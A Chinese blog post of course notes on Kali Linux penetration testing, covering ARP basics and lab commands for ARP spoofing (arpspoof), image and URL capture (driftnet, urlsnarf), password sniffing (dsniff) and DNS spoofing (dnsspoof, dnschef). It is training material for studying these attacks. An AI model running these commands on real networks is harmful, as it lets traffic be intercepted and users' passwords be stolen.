本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 密码嗅探


1. 简介

  1. 二、三层地址

    • IP 网络到网络
    • MAC 主机到主机
  2. 交换机与HUB

    • HUB全端口转发
    • 交换机根据学习地址转发
    • 混杂模式抓包
  3. ARP协议

    • 免费ARP
    • 基于广播学习
    • 以太网头、ARP头
    • 请求、响应相对独立
    • 基于传闻的协议
  4. 手动修改数据包实现ARP欺骗

    • omnipeek

2. 手动欺骗并抓包

  1. arp 欺骗

     root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
     root@kali:~# arpspoof -t 10.10.10.133 -r 10.10.10.1
    
  2. 网络嗅探

     # 实时显示图片
     root@kali:~# driftnet -i eth0 
     # -a 不要在屏幕上显示图像,而是将其保存到一个临时目录中,并在标准输出上公布它们的名称。
     # -d 指定目录
     # -s 抓取声音
     root@kali:~# driftnet -i eth0 -a -d testdir -s
    
     # 抓取 URL
     root@kali:~# webspy -i eth0 10.10.10.133
     root@kali:~# urlsnarf -i eth0
    
     # 嗅探密码
     # -m:自动协议检测
     root@kali:~# dsniff -i eth0 -m
     # 支持的协议类型
     root@kali:~# cat /usr/lib/x86_64-linux-gnu/dsniff.services
    

    在这里插入图片描述

     # dns 欺骗
     dnsspoof -i eth0 -f /usr/share/dsniff/dnsspoof.hosts
    
  3. DNS欺骗代理

     root@kali:~# dnschef --fakeip=10.10.10.2 --fakedomains=www.google.com,www.youtube.com --interface 10.10.10.131 -q
     root@kali:~# netstat -tulnp | grep 53
    

    在这里插入图片描述

     # 将被害者DNS指向伪造的DNS服务器
    
  4. 欺骗综合工具 PytheM

    Python渗透测试框架:PytheM

     root@kali:~# git clone https://github.com/m4n3dw0lf/PytheM/
     root@kali:~/PytheM# cat README.md
    
Logo

更多推荐